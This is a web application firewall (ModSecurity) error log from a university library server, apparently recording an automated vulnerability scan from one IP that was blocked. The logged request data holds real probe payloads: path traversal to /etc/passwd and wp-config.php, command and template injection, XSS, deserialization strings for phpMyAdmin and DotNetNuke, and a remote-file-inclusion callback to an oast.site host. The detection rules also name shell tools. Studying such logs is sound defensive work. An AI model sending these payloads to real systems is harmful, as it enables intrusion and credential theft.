[Tue Aug 29 11:42:14.415283 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAQSWyoAAAA0"]
[Tue Aug 29 11:42:15.446676 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdYBA4AAAAe"]
[Tue Aug 29 11:42:17.372101 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAddJrAAAAAh"]
[Tue Aug 29 11:42:19.376175 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdaZOoAAAAM"]
[Tue Aug 29 11:42:19.426731 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdYBBYAAAAe"]
[Tue Aug 29 11:42:21.593528 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAc-50wAAAAN"]
[Tue Aug 29 11:42:23.389914 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdcs94AAAAC"]
[Tue Aug 29 11:42:24.396302 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAcsLHEAAAAE"]
[Tue Aug 29 11:42:25.365697 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAddJroAAAAh"]
[Tue Aug 29 11:42:26.400444 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAcoNikAAAAF"]
[Tue Aug 29 11:42:27.402579 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdxUQEAAAAC"]
[Tue Aug 29 11:42:27.450808 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdSZL8AAAAX"]
[Tue Aug 29 11:42:28.386790 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdsFhEAAAAo"]
[Tue Aug 29 11:42:30.396253 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NsCo-f0AAAcoNi8AAAAF"]
[Tue Aug 29 11:42:32.394531 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g6xybhped1f1iy.oast.site found within TX:1: cjmnbitjmimt14dgn26g6xybhped1f1iy.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAdxUQgAAAAC"]
[Tue Aug 29 11:42:32.427650 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "perpustakaan.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAd230kAAAAI"]
[Tue Aug 29 11:42:34.422641 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAd9ULgAAAAr"]
[Tue Aug 29 11:42:34.463987 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAdaZP8AAAAM"]
[Tue Aug 29 11:42:40.515157 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAc92zMAAAAD"]
[Tue Aug 29 11:42:40.515157 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAdxUR8AAAAC"]
[Tue Aug 29 11:42:41.479779 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAd9UMoAAAAr"]
[Tue Aug 29 11:42:42.375677 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAeChXoAAAAw"]
[Tue Aug 29 11:42:43.369263 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAeX1A8AAAAK"]
[Tue Aug 29 11:42:46.371477 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdTBBUAAAAY"]
[Tue Aug 29 11:42:46.561158 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAeX1BcAAAAK"]
[Tue Aug 29 11:42:47.388050 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAeX1BgAAAAK"]
[Tue Aug 29 11:42:48.387544 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAd4ayUAAAAj"]
[Tue Aug 29 11:42:48.415587 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAd-Fz8AAAAt"]
[Tue Aug 29 11:42:48.446670 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAeX1BsAAAAK"]
